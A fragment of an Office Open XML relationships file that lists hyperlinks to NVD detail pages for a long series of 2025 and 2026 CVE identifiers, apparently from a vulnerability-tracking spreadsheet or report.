Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15140" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18905" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19283" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19304" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19306" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28802" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44293" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44495" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54493" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57171" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66738" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69192" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70479" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73217" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73218" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77775" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81210" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81832" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84256" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87996" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47666" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53958" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54245" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70454" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71048" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71327" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73083" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73408" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48431" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69223" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13297" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17255" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17470" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18175" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19300" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19305" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19534" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23490" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24301" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25639" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26456" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29074" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3039" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30922" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32286" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32597" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33231" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33894" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34355" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34986" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35172" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41602" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42151" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42536" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43003" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44250" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44486" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44488" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44496" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44890" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45736" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45741" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45742" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46625" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47885" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47886" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47888" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47889" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48779" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48804" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49362" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49363" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50010" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50011" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52880" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54293" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55099" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55552" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55553" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55620" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55841" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56671" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5946" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59902" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62295" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62296" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63408" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63421" TargetMode="External" Id="rId1060" 